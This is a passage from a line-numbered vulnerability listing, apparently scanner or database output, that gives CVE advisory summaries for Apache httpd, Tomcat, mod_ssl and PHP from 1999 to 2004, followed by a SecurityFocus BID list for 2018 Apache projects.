13775| [CVE-2004-0786] The IPv6 URI parsing routines in the apr-util library for Apache 2.0.50 and earlier allow remote attackers to cause a denial of service (child process crash) via a certain URI, as demonstrated using the Codenomicon HTTP Test Tool.
13776| [CVE-2004-0751] The char_buffer_read function in the mod_ssl module for Apache 2.x, when using reverse proxying to an SSL server, allows remote attackers to cause a denial of service (segmentation fault).
13777| [CVE-2004-0748] mod_ssl in Apache 2.0.50 and earlier allows remote attackers to cause a denial of service (CPU consumption) by aborting an SSL connection in a way that causes an Apache child process to enter an infinite loop.
13778| [CVE-2004-0747] Buffer overflow in Apache 2.0.50 and earlier allows local users to gain apache privileges via a .htaccess file that causes the overflow during expansion of environment variables.
13779| [CVE-2004-0700] Format string vulnerability in the mod_proxy hook functions function in ssl_engine_log.c in mod_ssl before 2.8.19 for Apache before 1.3.31 may allow remote attackers to execute arbitrary messages via format string specifiers in certain log messages for HTTPS that are handled by the ssl_log function.
13780| [CVE-2004-0646] Buffer overflow in the WriteToLog function for JRun 3.0 through 4.0 web server connectors, such as (1) mod_jrun and (2) mod_jrun20 for Apache, with verbose logging enabled, allows remote attackers to execute arbitrary code via a long HTTP header Content-Type field or other fields.
13781| [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
13782| [CVE-2004-0493] The ap_get_mime_headers_core function in Apache httpd 2.0.49 allows remote attackers to cause a denial of service (memory exhaustion), and possibly an integer signedness error leading to a heap-based buffer overflow on 64 bit systems, via long header lines with large numbers of space or tab characters.
13783| [CVE-2004-0492] Heap-based buffer overflow in proxy_util.c for mod_proxy in Apache 1.3.25 to 1.3.31 allows remote attackers to cause a denial of service (process crash) and possibly execute arbitrary code via a negative Content-Length HTTP header field, which causes a large amount of data to be copied.
13784| [CVE-2004-0490] cPanel, when compiling Apache 1.3.29 and PHP with the mod_phpsuexec option, does not set the --enable-discard-path option, which causes php to use the SCRIPT_FILENAME variable to find and execute a script instead of the PATH_TRANSLATED variable, which allows local users to execute arbitrary PHP code as other users via a URL that references the attacker's script after the user's script, which executes the attacker's script with the user's privileges, a different vulnerability than CVE-2004-0529.
13785| [CVE-2004-0488] Stack-based buffer overflow in the ssl_util_uuencode_binary function in ssl_util.c for Apache mod_ssl, when mod_ssl is configured to trust the issuing CA, may allow remote attackers to execute arbitrary code via a client certificate with a long subject DN.
13786| [CVE-2004-0263] PHP 4.3.4 and earlier in Apache 1.x and 2.x (mod_php) can leak global variables between virtual hosts that are handled by the same Apache child process but have different settings, which could allow remote attackers to obtain sensitive information.
13787| [CVE-2004-0174] Apache 1.4.x before 1.3.30, and 2.0.x before 2.0.49, when using multiple listening sockets on certain platforms, allows remote attackers to cause a denial of service (blocked new connections) via a "short-lived connection on a rarely-accessed listening socket."
13788| [CVE-2004-0173] Directory traversal vulnerability in Apache 1.3.29 and earlier, and Apache 2.0.48 and earlier, when running on Cygwin, allows remote attackers to read arbitrary files via a URL containing "..%5C" (dot dot encoded backslash) sequences.
13789| [CVE-2004-0113] Memory leak in ssl_engine_io.c for mod_ssl in Apache 2 before 2.0.49 allows remote attackers to cause a denial of service (memory consumption) via plain HTTP requests to the SSL port of an SSL-enabled server.
13790| [CVE-2004-0009] Apache-SSL 1.3.28+1.52 and earlier, with SSLVerifyClient set to 1 or 3 and SSLFakeBasicAuth enabled, allows remote attackers to forge a client certificate by using basic authentication with the "one-line DN" of the target user.
13791| [CVE-2003-1581] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, allows remote attackers to inject arbitrary text into log files via an HTTP request in conjunction with a crafted DNS response, as demonstrated by injecting XSS sequences, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
13792| [CVE-2003-1580] The Apache HTTP Server 2.0.44, when DNS resolution is enabled for client IP addresses, uses a logging format that does not identify whether a dotted quad represents an unresolved IP address, which allows remote attackers to spoof IP addresses via crafted DNS responses containing numerical top-level domains, as demonstrated by a forged 123.123.123.123 domain name, related to an "Inverse Lookup Log Corruption (ILLC)" issue.
13793| [CVE-2003-1573] The PointBase 4.6 database component in the J2EE 1.4 reference implementation (J2EE/RI) allows remote attackers to execute arbitrary programs, conduct a denial of service, and obtain sensitive information via a crafted SQL statement, related to "inadequate security settings and library bugs in sun.* and org.apache.* packages."
13794| [CVE-2003-1521] Sun Java Plug-In 1.4 through 1.4.2_02 allows remote attackers to repeatedly access the floppy drive via the createXmlDocument method in the org.apache.crimson.tree.XmlDocument class, which violates the Java security model.
13795| [CVE-2003-1516] The org.apache.xalan.processor.XSLProcessorVersion class in Java Plug-in 1.4.2_01 allows signed and unsigned applets to share variables, which violates the Java security model and could allow remote attackers to read or write data belonging to a signed applet.
13796| [CVE-2003-1502] mod_throttle 3.0 allows local users with Apache privileges to access shared memory that points to a file that is writable by the apache user, which could allow local users to gain privileges.
13797| [CVE-2003-1418] Apache HTTP Server 1.3.22 through 1.3.27 on OpenBSD allows remote attackers to obtain sensitive information via (1) the ETag header, which reveals the inode number, or (2) multipart MIME boundary, which reveals child process IDs (PID).
13798| [CVE-2003-1307] ** DISPUTED ** The mod_php module for the Apache HTTP Server allows local users with write access to PHP scripts to send signals to the server's process group and use the server's file descriptors, as demonstrated by sending a STOP signal, then intercepting incoming connections on the server's TCP port. NOTE: the PHP developer has disputed this vulnerability, saying "The opened file descriptors are opened by Apache. It is the job of Apache to protect them ... Not a bug in PHP."
13799| [CVE-2003-1172] Directory traversal vulnerability in the view-source sample file in Apache Software Foundation Cocoon 2.1 and 2.2 allows remote attackers to access arbitrary files via a .. (dot dot) in the filename parameter.
13800| [CVE-2003-1171] Heap-based buffer overflow in the sec_filter_out function in mod_security 1.7RC1 through 1.7.1 in Apache 2 allows remote attackers to execute arbitrary code via a server side script that sends a large amount of data.
13801| [CVE-2003-1138] The default configuration of Apache 2.0.40, as shipped with Red Hat Linux 9.0, allows remote attackers to list directory contents, even if auto indexing is turned off and there is a default web page configured, via a GET request containing a double slash (//).
13802| [CVE-2003-1054] mod_access_referer 1.0.2 allows remote attackers to cause a denial of service (crash) via a malformed Referer header that is missing a hostname, as parsed by the ap_parse_uri_components function in Apache, which triggers a null dereference.
13803| [CVE-2003-0993] mod_access in Apache 1.3 before 1.3.30, when running big-endian 64-bit platforms, does not properly parse Allow/Deny rules using IP addresses without a netmask, which could allow remote attackers to bypass intended access restrictions.
13804| [CVE-2003-0987] mod_digest for Apache before 1.3.31 does not properly verify the nonce of a client response by using an AuthNonce secret.
13805| [CVE-2003-0866] The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.
13806| [CVE-2003-0844] mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode without the Apache log, allows local users to overwrite arbitrary files via (1) a symlink attack on predictable temporary filenames on Unix systems, or (2) an NTFS hard link on Windows systems when the "Strengthen default permissions of internal system objects" policy is not enabled.
13807| [CVE-2003-0843] Format string vulnerability in mod_gzip_printf for mod_gzip 1.3.26.1a and earlier, and possibly later official versions, when running in debug mode and using the Apache log, allows remote attackers to execute arbitrary code via format string characters in an HTTP GET request with an "Accept-Encoding: gzip" header.
13808| [CVE-2003-0789] mod_cgid in Apache before 2.0.48, when using a threaded MPM, does not properly handle CGI redirect paths, which could cause Apache to send the output of a CGI program to the wrong client.
13809| [CVE-2003-0771] Gallery.pm in Apache::Gallery (aka A::G) uses predictable temporary filenames when running Inline::C, which allows local users to execute arbitrary code by creating and modifying the files before Apache::Gallery does.
13810| [CVE-2003-0658] Docview before 1.1-18 in Caldera OpenLinux 3.1.1, SCO Linux 4.0, OpenServer 5.0.7, configures the Apache web server in a way that allows remote attackers to read arbitrary publicly readable files via a certain URL, possibly related to rewrite rules.
13811| [CVE-2003-0542] Multiple stack-based buffer overflows in (1) mod_alias and (2) mod_rewrite for Apache before 1.3.29 allow attackers to create configuration files to cause a denial of service (crash) or execute arbitrary code via a regular expression with more than 9 captures.
13812| [CVE-2003-0460] The rotatelogs program on Apache before 1.3.28, for Windows and OS/2 systems, does not properly ignore certain control characters that are received over the pipe, which could allow remote attackers to cause a denial of service.
13813| [CVE-2003-0254] Apache 2 before 2.0.47, when running on an IPv6 host, allows attackers to cause a denial of service (CPU consumption by infinite loop) when the FTP proxy server fails to create an IPv6 socket.
13814| [CVE-2003-0253] The prefork MPM in Apache 2 before 2.0.47 does not properly handle certain errors from accept, which could lead to a denial of service.
13815| [CVE-2003-0249] ** DISPUTED ** PHP treats unknown methods such as "PoSt" as a GET request, which could allow attackers to bypass intended access restrictions if PHP is running on a server that passes on all methods, such as Apache httpd 2.0, as demonstrated using a Limit directive. NOTE: this issue has been disputed by the Apache security team, saying "It is by design that PHP allows scripts to process any request method. A script which does not explicitly verify the request method will hence be processed as normal for arbitrary methods. It is therefore expected behaviour that one cannot implement per-method access control using the Apache configuration alone, which is the assumption made in this report."
13816| [CVE-2003-0245] Vulnerability in the apr_psprintf function in the Apache Portable Runtime (APR) library for Apache 2.0.37 through 2.0.45 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via long strings, as demonstrated using XML objects to mod_dav, and possibly other vectors.
13817| [CVE-2003-0192] Apache 2 before 2.0.47, and certain versions of mod_ssl for Apache 1.3, do not properly handle "certain sequences of per-directory renegotiations and the SSLCipherSuite directive being used to upgrade from a weak ciphersuite to a strong one," which could cause Apache to use the weak ciphersuite.
13818| [CVE-2003-0189] The authentication module for Apache 2.0.40 through 2.0.45 on Unix does not properly handle threads safely when using the crypt_r or crypt functions, which allows remote attackers to cause a denial of service (failed Basic authentication with valid usernames and passwords) when a threaded MPM is used.
13819| [CVE-2003-0134] Unknown vulnerability in filestat.c for Apache running on OS2, versions 2.0 through 2.0.45, allows unknown attackers to cause a denial of service via requests related to device names.
13820| [CVE-2003-0132] A memory leak in Apache 2.0 through 2.0.44 allows remote attackers to cause a denial of service (memory consumption) via large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each linefeed.
13821| [CVE-2003-0083] Apache 1.3 before 1.3.25 and Apache 2.0 before version 2.0.46 does not filter terminal escape sequences from its access logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences, a different vulnerability than CVE-2003-0020.
13822| [CVE-2003-0020] Apache does not filter terminal escape sequences from its error logs, which could make it easier for attackers to insert those sequences into terminal emulators containing vulnerabilities related to escape sequences.
13823| [CVE-2003-0017] Apache 2.0 before 2.0.44 on Windows platforms allows remote attackers to obtain certain files via an HTTP request that ends in certain illegal characters such as ">", which causes a different filename to be processed and served.
13824| [CVE-2003-0016] Apache before 2.0.44, when running on unpatched Windows 9x and Me operating systems, allows remote attackers to cause a denial of service or execute arbitrary code via an HTTP request containing MS-DOS device names.
13825| [CVE-2002-2310] ClickCartPro 4.0 stores the admin_user.db data file under the web document root with insufficient access control on servers other than Apache, which allows remote attackers to obtain usernames and passwords.
13826| [CVE-2002-2309] php.exe in PHP 3.0 through 4.2.2, when running on Apache, does not terminate properly, which allows remote attackers to cause a denial of service via a direct request without arguments.
13827| [CVE-2002-2272] Tomcat 4.0 through 4.1.12, using mod_jk 1.2.1 module on Apache 1.3 through 1.3.27, allows remote attackers to cause a denial of service (desynchronized communications) via an HTTP GET request with a Transfer-Encoding chunked field with invalid values.
13828| [CVE-2002-2103] Apache before 1.3.24, when writing to the log file, records a spoofed hostname from the reverse lookup of an IP address, even when a double-reverse lookup fails, which allows remote attackers to hide the original source of activities.
13829| [CVE-2002-2029] PHP, when installed on Windows with Apache and ScriptAlias for /php/ set to c:/php/, allows remote attackers to read arbitrary files and possibly execute arbitrary programs via an HTTP request for php.exe with a filename in the query string.
13830| [CVE-2002-2012] Unknown vulnerability in Apache 1.3.19 running on HP Secure OS for Linux 1.0 allows remote attackers to cause "unexpected results" via an HTTP request.
13831| [CVE-2002-2009] Apache Tomcat 4.0.1 allows remote attackers to obtain the web root path via HTTP requests for JSP files preceded by (1) +/, (2) >/, (3) </, and (4) %20/, which leaks the pathname in an error message.
13832| [CVE-2002-2008] Apache Tomcat 4.0.3 for Windows allows remote attackers to obtain the web root path via an HTTP request for a resource that does not exist, such as lpt9, which leaks the information in an error message.
13833| [CVE-2002-2007] The default installations of Apache Tomcat 3.2.3 and 3.2.4 allows remote attackers to obtain sensitive system information such as directory listings and web root path, via erroneous HTTP requests for Java Server Pages (JSP) in the (1) test/jsp, (2) samples/jsp and (3) examples/jsp directories, or the (4) test/realPath.jsp servlet, which leaks pathnames in error messages.
13834| [CVE-2002-2006] The default installation of Apache Tomcat 4.0 through 4.1 and 3.0 through 3.3.1 allows remote attackers to obtain the installation path and other sensitive system information via the (1) SnoopServlet or (2) TroubleShooter example servlets.
13835| [CVE-2002-1895] The servlet engine in Jakarta Apache Tomcat 3.3 and 4.0.4, when using IIS and the ajp1.3 connector, allows remote attackers to cause a denial of service (crash) via a large number of HTTP GET requests for an MS-DOS device such as AUX, LPT1, CON, or PRN.
13836| [CVE-2002-1850] mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.
13837| [CVE-2002-1793] HTTP Server mod_ssl module running on HP-UX 11.04 with Virtualvault OS (VVOS) 4.5 through 4.6 closes the connection when the Apache server times out during an SSL request, which may allow attackers to cause a denial of service.
13838| [CVE-2002-1658] Buffer overflow in htdigest in Apache 1.3.26 and 1.3.27 may allow attackers to execute arbitrary code via a long user argument. NOTE: since htdigest is normally only locally accessible and not setuid or setgid, there are few attack vectors which would lead to an escalation of privileges, unless htdigest is executed from a CGI program. Therefore this may not be a vulnerability.
13839| [CVE-2002-1635] The Apache configuration file (httpd.conf) in Oracle 9i Application Server (9iAS) uses a Location alias for /perl directory instead of a ScriptAlias, which allows remote attackers to read the source code of arbitrary CGI files via a URL containing the /perl directory instead of /cgi-bin.
13840| [CVE-2002-1593] mod_dav in Apache before 2.0.42 does not properly handle versioning hooks, which may allow remote attackers to kill a child process via a null dereference and cause a denial of service (CPU consumption) in a preforked multi-processing module.
13841| [CVE-2002-1592] The ap_log_rerror function in Apache 2.0 through 2.035, when a CGI application encounters an error, sends error messages to the client that include the full path for the server, which allows remote attackers to obtain sensitive information.
13842| [CVE-2002-1567] Cross-site scripting (XSS) vulnerability in Apache Tomcat 4.1 allows remote attackers to execute arbitrary web script and steal cookies via a URL with encoded newlines followed by a request to a .jsp file whose name contains the script.
13843| [CVE-2002-1394] Apache Tomcat 4.0.5 and earlier, when using both the invoker servlet and the default servlet, allows remote attackers to read source code for server files or bypass certain protections, a variant of CAN-2002-1148.
13844| [CVE-2002-1233] A regression error in the Debian distributions of the apache-ssl package (before 1.3.9 on Debian 2.2, and before 1.3.26 on Debian 3.0), for Apache 1.3.27 and earlier, allows local users to read or modify the Apache password file via a symlink attack on temporary files when the administrator runs (1) htpasswd or (2) htdigest, a re-introduction of a vulnerability that was originally identified and addressed by CVE-2001-0131.
13845| [CVE-2002-1157] Cross-site scripting vulnerability in the mod_ssl Apache module 2.8.9 and earlier, when UseCanonicalName is off and wildcard DNS is enabled, allows remote attackers to execute script as other web site visitors, via the server name in an HTTPS response on the SSL port, which is used in a self-referencing URL, a different vulnerability than CAN-2002-0840.
13846| [CVE-2002-1156] Apache 2.0.42 allows remote attackers to view the source code of a CGI script via a POST request to a directory with both WebDAV and CGI enabled.
13847| [CVE-2002-1148] The default servlet (org.apache.catalina.servlets.DefaultServlet) in Tomcat 4.0.4 and 4.1.10 and earlier allows remote attackers to read source code for server files via a direct request to the servlet.
13848| [CVE-2002-0935] Apache Tomcat 4.0.3, and possibly other versions before 4.1.3 beta, allows remote attackers to cause a denial of service (resource exhaustion) via a large number of requests to the server with null characters, which causes the working threads to hang.
13849| [CVE-2002-0843] Buffer overflows in the ApacheBench benchmark support program (ab.c) in Apache before 1.3.27, and Apache 2.x before 2.0.43, allow a malicious web server to cause a denial of service and possibly execute arbitrary code via a long response.
13850| [CVE-2002-0840] Cross-site scripting (XSS) vulnerability in the default error page of Apache 2.0 before 2.0.43, and 1.3.x up to 1.3.26, when UseCanonicalName is "Off" and support for wildcard DNS is present, allows remote attackers to execute script as other web page visitors via the Host: header, a different vulnerability than CAN-2002-1157.
13851| [CVE-2002-0839] The shared memory scoreboard in the HTTP daemon for Apache 1.3.x before 1.3.27 allows any user running as the Apache UID to send a SIGUSR1 signal to any process as root, resulting in a denial of service (process kill) or possibly other behaviors that would not normally be allowed, by modifying the parent[].pid and parent[].last_rtime segments in the scoreboard.
13852| [CVE-2002-0682] Cross-site scripting vulnerability in Apache Tomcat 4.0.3 allows remote attackers to execute script as other web users via script in a URL with the /servlet/ mapping, which does not filter the script when an exception is thrown by the servlet.
13853| [CVE-2002-0661] Directory traversal vulnerability in Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to read arbitrary files and execute commands via .. (dot dot) sequences containing \ (backslash) characters.
13854| [CVE-2002-0658] OSSP mm library (libmm) before 1.2.0 allows the local Apache user to gain privileges via temporary files, possibly via a symbolic link attack.
13855| [CVE-2002-0654] Apache 2.0 through 2.0.39 on Windows, OS2, and Netware allows remote attackers to determine the full pathname of the server via (1) a request for a .var file, which leaks the pathname in the resulting error message, or (2) via an error message that occurs when a script (child process) cannot be invoked.
13856| [CVE-2002-0653] Off-by-one buffer overflow in the ssl_compat_directive function, as called by the rewrite_command hook for mod_ssl Apache module 2.8.9 and earlier, allows local users to execute arbitrary code as the Apache server user via .htaccess files with long entries.
13857| [CVE-2002-0513] The PHP administration script in popper_mod 1.2.1 and earlier relies on Apache .htaccess authentication, which allows remote attackers to gain privileges if the script is not appropriately configured by the administrator.
13858| [CVE-2002-0493] Apache Tomcat may be started without proper security settings if errors are encountered while reading the web.xml file, which could allow attackers to bypass intended restrictions.
13859| [CVE-2002-0392] Apache 1.3 through 1.3.24, and Apache 2.0 through 2.0.36, allows remote attackers to cause a denial of service and possibly execute arbitrary code via a chunk-encoded HTTP request that causes Apache to use an incorrect size.
13860| [CVE-2002-0259] InstantServers MiniPortal 1.1.5 and earlier stores sensitive login and account data in plaintext in (1) .pwd files in the miniportal/apache directory, or (2) mplog.txt, which could allow local users to gain privileges.
13861| [CVE-2002-0249] PHP for Windows, when installed on Apache 2.0.28 beta as a standalone CGI module, allows remote attackers to obtain the physical path of the php.exe via a request with malformed arguments such as /123, which leaks the pathname in the error message.
13862| [CVE-2002-0240] PHP, when installed with Apache and configured to search for index.php as a default web page, allows remote attackers to obtain the full pathname of the server via the HTTP OPTIONS method, which reveals the pathname in the resulting error message.
13863| [CVE-2002-0082] The dbm and shm session cache code in mod_ssl before 2.8.7-1.3.23, and Apache-SSL before 1.3.22+1.46, does not properly initialize memory using the i2d_SSL_SESSION function, which allows remote attackers to use a buffer overflow to execute arbitrary code via a large client certificate that is signed by a trusted Certificate Authority (CA), which produces a large serialized session.
13864| [CVE-2002-0061] Apache for Win32 before 1.3.24, and 2.0.x before 2.0.34-beta, allows remote attackers to execute arbitrary commands via shell metacharacters (a | pipe character) provided as arguments to batch (.bat) or .cmd scripts, which are sent unfiltered to the shell interpreter, typically cmd.exe.
13865| [CVE-2001-1556] The log files in Apache web server contain information directly supplied by clients and do not filter or quote control characters, which could allow remote attackers to hide HTTP requests and spoof source IP addresses when logs are viewed with UNIX programs such as cat, tail, and grep.
13866| [CVE-2001-1534] mod_usertrack in Apache 1.3.11 through 1.3.20 generates session ID's using predictable information including host IP address, system time and server process ID, which allows local users to obtain session ID's and bypass authentication when these session ID's are used for authentication.
13867| [CVE-2001-1510] Allaire JRun 2.3.3, 3.0 and 3.1 running on IIS 4.0 and 5.0, iPlanet, Apache, JRun web server (JWS), and possibly other web servers allows remote attackers to read arbitrary files and directories by appending (1) "%3f.jsp", (2) "?.jsp" or (3) "?" to the requested URL.
13868| [CVE-2001-1449] The default installation of Apache before 1.3.19 on Mandrake Linux 7.1 through 8.0 and Linux Corporate Server 1.0.1 allows remote attackers to list the directory index of arbitrary web directories.
13869| [CVE-2001-1385] The Apache module for PHP 4.0.0 through PHP 4.0.4, when disabled with the 'engine = off' option for a virtual host, may disable PHP for other virtual hosts, which could cause Apache to serve the source code of PHP scripts.
13870| [CVE-2001-1342] Apache before 1.3.20 on Windows and OS/2 systems allows remote attackers to cause a denial of service (GPF) via an HTTP request for a URI that contains a large number of / (slash) or other characters, which causes certain functions to dereference a null pointer.
13871| [CVE-2001-1217] Directory traversal vulnerability in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to access sensitive information via a double encoded URL with .. (dot dot) sequences.
13872| [CVE-2001-1216] Buffer overflow in PL/SQL Apache module in Oracle 9i Application Server allows remote attackers to execute arbitrary code via a long request for a help page.
13873| [CVE-2001-1072] Apache with mod_rewrite enabled on most UNIX systems allows remote attackers to bypass RewriteRules by inserting extra / (slash) characters into the requested path, which causes the regular expression in the RewriteRule to fail.
13874| [CVE-2001-1013] Apache on Red Hat Linux with the UserDir directive enabled generates different error codes when a username exists and there is no public_html directory and when the username does not exist, which could allow remote attackers to determine valid usernames on the server.
13875| [CVE-2001-0925] The default installation of Apache before 1.3.19 allows remote attackers to list directories instead of the multiview index.html file via an HTTP request for a path that contains many / (slash) characters, which causes the path to be mishandled by (1) mod_negotiation, (2) mod_dir, or (3) mod_autoindex.
13876| [CVE-2001-0829] A cross-site scripting vulnerability in Apache Tomcat 3.2.1 allows a malicious webmaster to embed Javascript in a request for a .JSP file, which causes the Javascript to be inserted into an error message.
13877| [CVE-2001-0766] Apache on MacOS X Client 10.0.3 with the HFS+ file system allows remote attackers to bypass access restrictions via a URL that contains some characters whose case is not matched by Apache's filters.
13878| [CVE-2001-0731] Apache 1.3.20 with Multiviews enabled allows remote attackers to view directory contents and bypass the index page via a URL containing the "M=D" query string.
13879| [CVE-2001-0730] split-logfile in Apache 1.3.20 allows remote attackers to overwrite arbitrary files that end in the .log extension via an HTTP request with a / (slash) in the Host: header.
13880| [CVE-2001-0729] Apache 1.3.20 on Windows servers allows remote attackers to bypass the default index page and list directory contents via a URL with a large number of / (slash) characters.
13881| [CVE-2001-0590] Apache Software Foundation Tomcat Servlet prior to 3.2.2 allows a remote attacker to read the source code to arbitrary 'jsp' files via a malformed URL request which does not end with an HTTP protocol specification (i.e. HTTP/1.0).
13882| [CVE-2001-0131] htpasswd and htdigest in Apache 2.0a9, 1.3.14, and others allows local users to overwrite arbitrary files via a symlink attack.
13883| [CVE-2001-0108] PHP Apache module 4.0.4 and earlier allows remote attackers to bypass .htaccess access restrictions via a malformed HTTP request on an unrestricted page that causes PHP to use those access controls on the next page that is requested.
13884| [CVE-2001-0042] PHP 3.x (PHP3) on Apache 1.3.6 allows remote attackers to read arbitrary files via a modified .. (dot dot) attack containing "%5c" (encoded backslash) sequences.
13885| [CVE-2000-1247] The default configuration of the jserv-status handler in jserv.conf in Apache JServ 1.1.2 includes an "allow from 127.0.0.1" line, which allows local users to discover JDBC passwords or other sensitive information via a direct request to the jserv/ URI.
13886| [CVE-2000-1210] Directory traversal vulnerability in source.jsp of Apache Tomcat before 3.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the argument to source.jsp.
13887| [CVE-2000-1206] Vulnerability in Apache httpd before 1.3.11, when configured for mass virtual hosting using mod_rewrite, or mod_vhost_alias in Apache 1.3.9, allows remote attackers to retrieve arbitrary files.
13888| [CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, disclosed on 20070724, is one such variant.
13889| [CVE-2000-1204] Vulnerability in the mod_vhost_alias virtual hosting module for Apache 1.3.9, 1.3.11 and 1.3.12 allows remote attackers to obtain the source code for CGI programs if the cgi-bin directory is under the document root.
13890| [CVE-2000-1168] IBM HTTP Server 1.3.6 (based on Apache) allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
13891| [CVE-2000-1016] The default configuration of Apache (httpd.conf) on SuSE 6.4 includes an alias for the /usr/doc directory, which allows remote attackers to read package documentation and obtain system configuration information via an HTTP request for the /doc/packages URL.
13892| [CVE-2000-0913] mod_rewrite in Apache 1.3.12 and earlier allows remote attackers to read arbitrary files if a RewriteRule directive is expanded to include a filename whose name contains a regular expression.
13893| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
13894| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary directories via the PROPFIND HTTP request method.
13895| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
13896| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
13897| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
13898| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
13899| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
13900| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
13901| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
13902| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
13903| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
13904| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
13905| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
13906| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
13907| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
13908| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
13909| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
13910| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
13911| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
13912| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
13913|
13914| SecurityFocus - https://www.securityfocus.com/bid/:
13915| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
13916| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
13917| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
13918| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
13919| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
13920| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
13921| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
13922| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
13923| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
13924| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
13925| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
13926| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
13927| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
13928| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
13929| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
13930| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
13931| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
13932| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
13933| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
13934| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
13935| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
13936| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
13937| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
13938| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
13939| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
